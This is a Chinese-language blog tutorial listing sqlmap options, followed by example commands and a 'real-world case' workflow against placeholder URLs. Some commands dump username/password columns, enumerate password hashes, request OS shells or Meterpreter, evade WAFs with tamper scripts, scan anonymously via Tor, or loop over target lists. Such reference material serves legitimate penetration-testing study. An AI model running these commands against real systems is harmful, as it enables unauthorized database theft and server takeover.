2024最新的最全面基本sqlmap使用命令

已于 2024-08-27 17:33:53 修改
阅读量517 收藏 8
点赞数 14
文章标签: 网络安全 sql
于 2024-08-27 17:33:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53693367/article/details/141608216
版权

sqlmap 是一个广泛使用的开源渗透测试工具,专门用于自动化检测和利用 SQL 注入漏洞。以下是对您列出的每个字段的详细举例说明:

基础帮助和版本

  • -h, --help:显示基本的帮助信息并退出。这对于快速查看最常用的选项非常有用。
  • -hh:显示高级帮助信息并退出。这包括更详细的选项描述和示例。
  • --version:显示程序的版本号并退出。这有助于确认您正在使用的 sqlmap 版本。

目标(Target)

  • -u URL, --url=URL:指定目标 URL。例如,"http://www.site.com/vuln.php?id=1",这通常是一个包含潜在 SQL 注入点的 URL。
  • -g GOOGLEDORK:处理 Google Dork 结果作为目标 URL。Google Dork 是一种搜索查询,用于在 Google 上查找可能包含漏洞的网站。

请求(Request)

  • --data=DATA:通过 POST 请求发送的数据字符串。例如,"id=1",这在测试需要 POST 请求的表单时非常有用。
  • --cookie=COOKIE:HTTP Cookie 头的值。例如,"PHPSESSID=a8d127e..",这对于需要会话认证的网站是必要的。
  • --random-agent:使用随机选择的 HTTP User-Agent 头值,以避免被网站通过 User-Agent 识别为自动化工具。
  • --proxy=PROXY:使用代理连接到目标 URL。这有助于绕过 IP 地址封锁或进行匿名测试。
  • --tor:使用 Tor 匿名网络。这有助于保持匿名性。
  • --check-tor:检查是否正确使用了 Tor。

注入(Injection)

  • -p TESTPARAMETER:指定要测试的参数。如果 URL 中有多个参数,您可以选择测试其中的特定一个或多个。
  • --dbms=DBMS:强制后端数据库管理系统(DBMS)为指定值。这有助于 sqlmap 更准确地识别目标 DBMS。

检测(Detection)

  • --level=LEVEL:设置执行的测试级别(1-5,默认为 1)。级别越高,执行的测试越彻底,但可能需要更长时间。
  • --risk=RISK:设置执行测试的风险级别(1-3,默认为 1)。风险级别越高,执行的测试可能越危险,如尝试修改数据库结构或数据。

技术(Techniques)

  • --technique=TECH..:指定要使用的 SQL 注入技术(默认为 "BEUSTQ")。这允许您根据目标的防御机制选择最合适的技术。

枚举(Enumeration)

  • -a, --all:检索所有可能的信息,包括数据库、表、列和数据。
  • -b, --banner:检索 DBMS 的 banner 信息。
  • --current-user:检索 DBMS 的当前用户。
  • --current-db:检索 DBMS 的当前数据库。
  • --passwords:枚举 DBMS 用户的密码哈希。
  • --dbs:枚举 DBMS 中的数据库。
  • --tables:枚举数据库中的表。
  • --columns:枚举表中的列。
  • --schema:枚举 DBMS 的架构。
  • --dump:转储指定数据库表的条目。
  • --dump-all:转储所有数据库表的条目。
  • -D DB:指定要枚举的 DBMS 数据库。
  • -T TBL:指定要枚举的 DBMS 数据库表。
  • -C COL:指定要枚举的 DBMS 数据库表列。

操作系统访问

  • --os-shell:请求一个交互式操作系统 shell。
  • --os-pwn:请求一个 out-of-band shell、Meterpreter 或 VNC,以便在底层操作系统上执行更高级的命令。

一般(General)

  • --batch:从不请求用户输入,使用默认行为。这对于自动化脚本非常有用。
  • --flush-session:为当前目标刷新会话文件。这有助于清理旧的测试数据。

其他(Miscellaneous)

  • --wizard:为初学者用户提供简单的向导界面。这有助于新用户更容易地开始使用 sqlmap

使用示例

要查看完整的选项列表,可以运行 sqlmap.py -hh。例如,要测试 URL http://www.site.com/vuln.php?id=1 的 id 参数是否存在 SQL 注入漏洞,可以使用以下命令:

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" -p id

混合使用

当然,我可以为你生成一些详细组合使用的sqlmap命令示例,涵盖不同的使用场景。请注意,由于sqlmap的选项非常丰富,我将选取几个典型的用例来展示。

1. 基本扫描

扫描单个URL
 

bash复制代码
 

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --level=3 --risk=2
 

这个命令将扫描指定的URL,使用中等测试级别(3)和中等风险级别(2)来寻找SQL注入漏洞。
 

2. 使用POST数据
 

发送POST请求
 

 

bash复制代码
 

sqlmap.py -u "http://www.site.com/login.php" --data="username=admin&password=123456" --level=3 --risk=3
 

这个命令通过POST方法发送用户名和密码,并使用高级别(3)和高风险(3)进行扫描。
 

3. 枚举数据库信息
 

枚举所有数据库
 

 

bash复制代码
 

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --dbs --batch
 

使用--dbs选项枚举后端数据库的所有数据库名,并启用--batch选项以避免任何交互式提示。
 

枚举特定数据库中的表
 

 

bash复制代码
 

sqlmap.py -u "http://www.site.com/vuln.php?id=1" -D usersdb --tables --batch
 

指定数据库usersdb并枚举其所有表。
 

导出特定表的数据
 

 

bash复制代码
 

sqlmap.py -u "http://www.site.com/vuln.php?id=1" -D usersdb -T users --dump --batch
 

导出usersdb数据库中users表的所有数据。
 

4. 使用代理和Tor
 

通过Tor进行扫描
 

 

bash复制代码
 

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --tor --check-tor --level=5
 

使用Tor匿名网络进行扫描,并检查Tor是否正确配置。
 

使用自定义代理
 

 

bash复制代码
 

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --proxy="http://127.0.0.1:8080" --level=4
 

通过本地代理(例如Burp Suite)进行扫描。
 

5. 自定义请求头
 

自定义User-Agent
 

 

bash复制代码
 

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --random-agent --level=3
 

每次请求使用随机的User-Agent头进行扫描。
 

添加Cookie
 

 

bash复制代码
 

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --cookie="PHPSESSID=a8d127e.." --level=2
 

添加自定义的Cookie头进行扫描。
 

6. 自定义注入测试
 

指定测试参数
 

 

bash复制代码
 

sqlmap.py -u "http://www.site.com/vuln.php?id=1&user=admin" -p "id,user" --level=5
 

指定iduser两个参数进行测试。
 

强制DBMS
 

 

bash复制代码
 

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --dbms=MySQL --level=4
 

强制后端数据库为MySQL并进行扫描。
 

这些示例应该能够涵盖sqlmap的一些常用和高级用法。请根据你的具体需求进行调整。
  
 

通过代理进行注入测试
 

 

bash复制代码
 

sqlmap -u "http://example.com/vuln.php?id=1" --proxy="http://127.0.0.1:8080"
 

绕过WAF/IDS的检测
 

 

bash复制代码
 

sqlmap -u "http://example.com/vuln.php?id=1" --tamper="space2comment"
 

批量处理多个URL
 

 

bash复制代码
 

sqlmap -m targets.txt
 

其中targets.txt包含多个目标URL,每行一个。
 

7.自动化与脚本化
 

使用自定义脚本
 

 

bash复制代码
 

sqlmap -u "http://example.com/vuln.php?id=1" --script=my_custom_script.py
 

批量自动化测试
 

结合shell脚本或Python脚本,批量调用sqlmap命令,处理大量目标。
 

8.高级特性与技巧
 

获取操作系统访问权限
 

 

bash复制代码
 

sqlmap -u "http://example.com/vuln.php?id=1" --os-shell
 

 

 

bash复制代码
 

sqlmap -u "http://example.com/vuln.php?id=1" --os-pwn
 

调试模式
 

 

bash复制代码
 

sqlmap -u "http://example.com/vuln.php?id=1" --debug
 

保存和恢复会话
 

 

bash复制代码
 

sqlmap -u "http://example.com/vuln.php?id=1" --save=session.sqlmap 
sqlmap --load=session.sqlmap
 

9.实战案例
 

实战案例1:检测并枚举目标
 

 

bash复制代码
 

# 第一步:检测SQL注入 
sqlmap -u "http://example.com/vuln.php?id=1" 
# 第二步:枚举所有数据库 
sqlmap -u "http://example.com/vuln.php?id=1" --dbs 
# 第三步:枚举特定数据库的所有表 
sqlmap -u "http://example.com/vuln.php?id=1" -D interesting_db --tables 
# 第四步:导出特定表的数据 
sqlmap -u "http://example.com/vuln.php?id=1" -D interesting_db -T users -C "username,password" --dump
 

实战案例2:自动化测试多个目标
 

 

bash复制代码
 

# 编写shell脚本,遍历targets.txt中的每个URL,使用sqlmap进行测试 
#!/bin/bash 
while read url; do 
sqlmap -u "$url" --dbs 
done < targets.txt

                

        

        

    




            

                    
            

    

      

        

            

              
                
                  文章永久免费只为良心
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    14
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    8
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
sqlmap各个命令的解释及其基本_sqlmap使用命令

				
			

			

				

					2401_84466225的博客
				

				

					04-26
					
					1213
					
				

			

		

		

			
				
指定注入技术 (B: Boolean-based blind, T: Time-based blind, U: UNION query, S: Stacked queries, etc.)。通过灵活运用这些命令,你可以充分发挥 SQLmap 的强大功能,深入挖掘网站的 SQL 注入漏洞。设置测试等级 (1-5),等级越高,测试越全面,时间也越长。设置风险等级 (1-3),等级越高,测试越具有攻击性。从目标 URL 开始爬取网站,并测试所有发现的链接。设置详细程度 (0-6),等级越高,输出信息越详细。

			
		

	



                

              
                



	

		

			

				
					
sqlmap使用教程大全命令大全(图文)

					
热门推荐

				
			

			

				

					Cwillchris的博客
				

				

					03-15
					
					6万+
					
				

			

		

		

			
				
我们先准备一个靶机,我这里拿经典的SQL大观园靶机



我们再url后面传参http://192.168.98.100/sqli-labs/Less-1/?id=1





接下来我们用此url进行SQLmap的教学http://192.168.98.100/sqli-labs/Less-1/?id=1



一、SQLmap基础操作

1.判断是否存在注入

假设目标注入点是http://192.168.98.100/sqli-labs/Less-1/?id=1,判断具是否存在注入的命令如下所示.



			
		

	



                


  
              

                


	

		

			

				
					
2024最新SQLmap常用命令 使用教程_sqlmap总是自动确认,网络安全开发真等于废人

				
			

			

				

					2401_84281698的博客
				

				

					05-11
					
					434
					
				

			

		

		

			
				
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。

			
		

	





	

		

			

				
					
Sqlmap命令使用

				
			

			

				

					一醉一休的博客
				

				

					02-27
					
					4180
					
				

			

		

		

			
				
Sqlmap基本命令使用,总结常用23条命令

			
		

	



		

			
		



	

		

			

				
					
SQLMap使用详解

				
			

			

				

					未完成的歌~的博客
				

				

					02-19
					
					2万+
					
				

			

		

		

			
				
文章目录前言:一、SQLMap介绍1、Sqlmap简介:2、Sqlmap支持的注入方式:二、SQLMap安装三、SQLMap使用:1、判断是否存在注入:2、判断文本中的请求是否存在注入:3、查询当前用户下的所有数据库:4、获取数据库中的表名:5、获取表中的字段名:6、获取字段内容:7、获取数据库的所有用户:8、获取数据库用户的密码:9、获取当前网站数据库的名称:10、获取当前网站数据库的用户名称:四、SQLMap进阶:参数讲解1、-- level 5:探测等级2、-- is-dba:当前用户是否为管理权限3

			
		

	





	

		

			

				
					
掌握SQL注入利器:SQLMap使用入门教程及技巧分享

				
			

			

				

					Hanko的专栏
				

				

					06-14
					
					1499
					
				

			

		

		

			
				
使用 SQLMap 之前,你需要识别目标应用程序的 URL 或请求中的参数,这些参数可能存在 SQL 注入漏洞。SQLMap 是一个功能强大的自动化 SQL 注入工具,它可以用于检测和利用 SQL 注入漏洞。首先,你需要从 SQLMap 的官方网站下载并安装 SQLMap 工具。根据你的操作系统选择适当的版本,并按照官方提供的安装说明进行安装。如request.txt。可以看到已经打印出数据库名称,如果是--dump命令打印的就是数据库表中的数据。

			
		

	





	

		

			

				
					
网络安全SQLMap详细使用教程

				
			

			

				

					程序员若风的博客
				

				

					07-30
					
					854
					
				

			

		

		

			
				
SQL注入是一种广泛存在于Web应用程序的漏洞,可以导致敏感数据泄露、系统破坏等严重后果。SQLMap是一款自动化SQL注入工具,它可以帮助渗透测试人员快速发现和利用SQL注入漏洞。本文将介绍SQLMap的详细使用教程和常用命令

			
		

	





	

		

			

				
					
sqlmap 介绍以及常见的使用命令

				
			

			

				

					nszmsjhshs的博客
				

				

					03-31
					
					725
					
				

			

		

		

			
				
sqlmap简介
sqlmap支持五种不同的注入模式:

1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
4、联合查询注入,可以使用union的情况下的注入。
5、堆查询注入,可以同时执行多条语句的执行时的注入。
sqlmap支持的数据库有
MySQL, Oracle, PostgreSQL

			
		

	





	

		

			

				
					
渗透工具-sqlmap-基本知识及使用教程

				
			

			

				

					m0_59856804的博客
				

				

					03-02
					
					1598
					
				

			

		

		

			
				
sqlmap的详细使用教程

			
		

	





	

		

			

				
					
sqlmap使用手册集合

				
			

			

				

					06-10
				

			

		

		

			
				
本手册集合将全面介绍SQLMap使用方法和技巧。  一、SQLMap基本概念 SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,控制或获取数据库中的敏感信息。SQLMap通过自动识别和利用这些注入漏洞,可以...

			
		

	





	

		

			

				
					
sqlmap-wiki-zhcn::syringe:可能是最完整的sqlmap中文文档

				
			

			

				

					02-04
				

			

		

		

			
				
SQLMap是一款强大的、自动化SQL...总的来说,"sqlmap-wiki-zhcn"文档全面地介绍了SQLMap的各个方面,从基础到高级,从理论到实践,为学习和使用SQLMap提供了丰富的资料,是提升SQL注入检测和利用技能的重要参考资料。

			
		

	





	

		

			

				
					
sqlmap自动扫描工具

				
			

			

				

					06-14
				

			

		

		

			
				
SQLMap是一款广泛使用的开源自动化SQL注入工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全研究人员或渗透测试人员快速、有效地发现和利用数据库服务器中的安全漏洞。下面将详细介绍SQLMap的工作原理、功能...

			
		

	





	

		

			

				
					
sqlmap使用手记

				
			

			

				

					03-01
				

			

		

		

			
				
SQLMap是由Python编写的,其最新版本为1.0-dev (r4405),推荐使用的Python版本为2.7.2。值得注意的是,使用更高版本的Python可能会导致SQLMap出现错误。如果在使用过程中遇到问题,可以参考稳定版本的链接进行更新或...

			
		

	





	

		

			

				
					
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》

				
			

			

				

					weixin_59086772的博客
				

				

					10-18
					
					8421
					
				

			

		

		

			
				
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。

今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。







一、网络安全行业市场发展情况

网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.

			
		

	





	

		

			

				
					
SQL统计行数的语句

				
			

			

				

					曹昆的技术博客
				

				

					08-27
					
					87
					
				

			

		

		

			
				
SQL 中,你可以使用 COUNT() 函数来统计查询结果的行数。这个函数可以用在不同的上下文中,具体取决于你想要统计的内容。

			
		

	





	

		

			

				
					
漏洞披露-金慧-综合管理信息系统-SQL

					
最新发布

				
			

			

				

					无问社区的博客
				

				

					08-27
					
					220
					
				

			

		

		

			
				
金慧数据资产管理平台是一款企业级数据资产管理软件,其基于先进的技术架构,具备操作简单、部署灵活、快速响应等特点。由于金慧-综合管理信息系统 LoginBegin.aspx(登录接口处)没有对外部输入的SQL语句进行严格的校验和过滤,直接带入数据库执行,导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

			
		

	





	

		

			

				
					
数据库查询大量数据避免内存溢出的方法

				
			

			

				

					huan1213858的博客
				

				

					08-23
					
					258
					
				

			

		

		

			
				
每次查询一定数量数据之后记录id,进行数据处理之后再继续查询继续处理,

			
		

	





	

		

			

				
					
SQL】关注者数量

				
			

			

				

					Frost_Descent的博客
				

				

					08-23
					
					556
					
				

			

		

		

			
				
(user_id, follower_id) 是这个表的主键(具有唯一值的列的组合)。count计数,count(follower_id) followers_count。该表包含一个关注关系中关注者和用户的编号,其中关注者关注用户。使用order by升序排列order by user_id。编写解决方案,对于每一个用户,返回该用户的关注者数量。按照用户id分组,group by user_id。查询结果的格式如下示例所示。2 的关注者有 {0,1}0 的关注者有 {1}1 的关注者有 {0}

			
		

	





	

		

			

				
					
sqlmap使用命令

				
			

			

				

					08-15
				

			

		

		

			
				
回答: sqlmap是一款用于自动化SQL注入和数据库接管的工具。以下是几个sqlmap使用命令示例:
1. 使用-d参数连接到目标数据库: sqlmap -d "mysql://user:password@192.168.20.10:3386/dvwa",其中mysql表示数据库类型,user:password表示目标服务器的账号和密码,@后表示要连接的服务器,3386表示端口,dvwa表示要连接的数据库名称。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
-  *1* *3* [sqlmap命令大全(附详细扫描流程)](https://blog.csdn.net/m0_50818626/article/details/130843335)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"]
-  *2* [Sqlmap命令大全](https://blog.csdn.net/phpppppppppp/article/details/124968358)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"]
[ .reference_list ]

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
文章永久免费只为良心

			
你的鼓励是我的动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值